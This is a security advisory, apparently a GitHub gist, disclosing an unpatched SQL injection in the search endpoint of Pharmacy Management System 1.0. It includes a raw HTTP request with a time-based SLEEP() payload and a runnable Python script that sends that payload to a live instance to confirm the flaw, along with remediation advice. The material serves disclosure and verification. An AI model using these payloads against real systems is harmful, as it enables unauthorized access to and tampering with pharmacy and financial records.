
@higordiego
Created October 15, 2024 21:13

Affected Version:

  • Pharmacy Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection
  • Severity: CRITICAL
  • Status: Unpatched

Vulnerable Endpoint:

  • /php/manage_purchase.php?action=search&text=3213&tag=VOUCHER_NUMBER

Vulnerability Description:

A critical SQL injection vulnerability was identified in the Pharmacy Management System version 1.0, in the Manage Purchase search functionality. The flaw is triggered through the text parameter of a GET request to the endpoint /php/manage_purchase.php?action=search&text=3213&tag=VOUCHER_NUMBER. The value of text is evidently placed into the SQL query without escaping or parameterization, so an attacker can close the string literal and append arbitrary SQL. The proof of concept below confirms this with a time-based blind payload (MySQL SLEEP()): when the injected condition is evaluated, the response is delayed by the requested number of seconds.

This vulnerability can expose sensitive information, including financial and operational data, and can be used to alter or delete records, disrupting the normal functioning of the system. As no patch is available, the risk remains critical and demands urgent mitigation: the affected query should be rewritten with prepared statements (bound parameters) for the text value, and if the tag parameter selects the column to search, it cannot be bound and must be checked against a fixed allow-list of column names.


Proof of Concept (PoC):

Below is a GET request demonstrating the injection. The text parameter carries a payload that closes the string literal, forces a 5-second SLEEP() inside a subquery, and comments out the remainder of the query (MySQL requires whitespace after the -- comment marker, hence the trailing text). A vulnerable server answers roughly 5 seconds later than it does for the unmodified request:

GET /php/manage_purchase.php?action=search&text=3213'%20AND%20(SELECT%203786%20FROM%20(SELECT(SLEEP(5)))Tbox)--%20XBUg&tag=VOUCHER_NUMBER HTTP/1.1
Host: localhost:8080
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/manage_purchase.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive
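The timing comparison that this PoC relies on, written out as a small verifier. This is an added example and not code from the gist or from the Pharmacy Management System: the endpoint path, parameter names and payload are taken from the request above, while the session cookie value, the helper names (http_get, fake_sender, confirm_time_based_sqli) and the 80% threshold are assumptions of this example. It measures the median latency of the benign search and of the SLEEP payload over several trials, so one slow response is not mistaken for a hit, and it uses only the standard library. The same check can be rerun after a fix to confirm that the delay no longer appears.

```python
import time
import urllib.parse
import urllib.request
from statistics import median

# Values taken from the advisory's PoC request. The endpoint and parameter names
# are the real ones; the session cookie is a placeholder that must be replaced
# (assumption: the search requires a logged-in session, as the PoC sends PHPSESSID).
BASE_URL = "http://localhost:8080/php/manage_purchase.php"
VOUCHER_NUMBER = "3213"
SESSION_COOKIE = "PHPSESSID=REPLACE_WITH_VALID_SESSION"


def build_url(text, tag="VOUCHER_NUMBER", base_url=BASE_URL):
    """Build the search URL. urlencode keeps quotes, parentheses and spaces
    intact for PHP's $_GET decoding ("'" -> %27, " " -> "+")."""
    query = urllib.parse.urlencode({"action": "search", "text": text, "tag": tag})
    return f"{base_url}?{query}"


def sleep_payload(value, delay):
    """The PoC payload: close the string literal, AND in a subquery that forces
    SLEEP(delay) to run, then comment out the rest of the statement. MySQL only
    treats '-- ' as a comment when followed by whitespace, hence the trailing text."""
    return f"{value}' AND (SELECT 3786 FROM (SELECT(SLEEP({delay})))Tbox)-- XBUg"


def http_get(url, cookie=SESSION_COOKIE, timeout=30):
    """Live sender: one authenticated GET. The body is irrelevant, only timing matters."""
    req = urllib.request.Request(url, headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        resp.read()


def fake_sender(vulnerable, delay):
    """Offline stand-in for http_get: a constructed server that sleeps only when it
    is 'vulnerable' and the URL carries the SLEEP payload (used for self-testing)."""
    def send(url):
        if vulnerable and "SLEEP" in url:
            time.sleep(delay)
    return send


def _elapsed(send, url):
    start = time.monotonic()
    send(url)
    return time.monotonic() - start


def confirm_time_based_sqli(send, delay=5, trials=3, value=VOUCHER_NUMBER, base_url=BASE_URL):
    """Compare the median latency of the benign search with that of the SLEEP payload.
    Measuring against a baseline (not an absolute threshold) and taking the median
    over several trials keeps network jitter from producing a false positive.
    Returns (is_vulnerable, baseline_seconds, injected_seconds)."""
    benign = build_url(value, base_url=base_url)
    injected = build_url(sleep_payload(value, delay), base_url=base_url)
    baseline = median(_elapsed(send, benign) for _ in range(trials))
    delayed = median(_elapsed(send, injected) for _ in range(trials))
    # Require most of the requested delay to show up; the threshold sits below
    # `delay` so minor clock noise does not mask a real hit.
    return delayed - baseline >= 0.8 * delay, baseline, delayed


if __name__ == "__main__":
    # Offline demonstration against the constructed fake server (0.5 s delay).
    for vulnerable in (True, False):
        hit, base, inj = confirm_time_based_sqli(fake_sender(vulnerable, 0.5), delay=0.5, trials=2)
        print(f"fake vulnerable={vulnerable}: flagged={hit} baseline={base:.2f}s injected={inj:.2f}s")
    # Against a live instance, once SESSION_COOKIE holds a valid session:
    # print(confirm_time_based_sqli(http_get, delay=5))
```

Run it as-is to see the offline demonstration; for a live check, set SESSION_COOKIE and call confirm_time_based_sqli(http_get). Keep delay well above the target's normal response time and raise trials on a noisy link.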

Burp Suite Requests:

  • Burp Suite PoC 1

SQLMap Exploit:

  • SQLMap PoC

External Links:
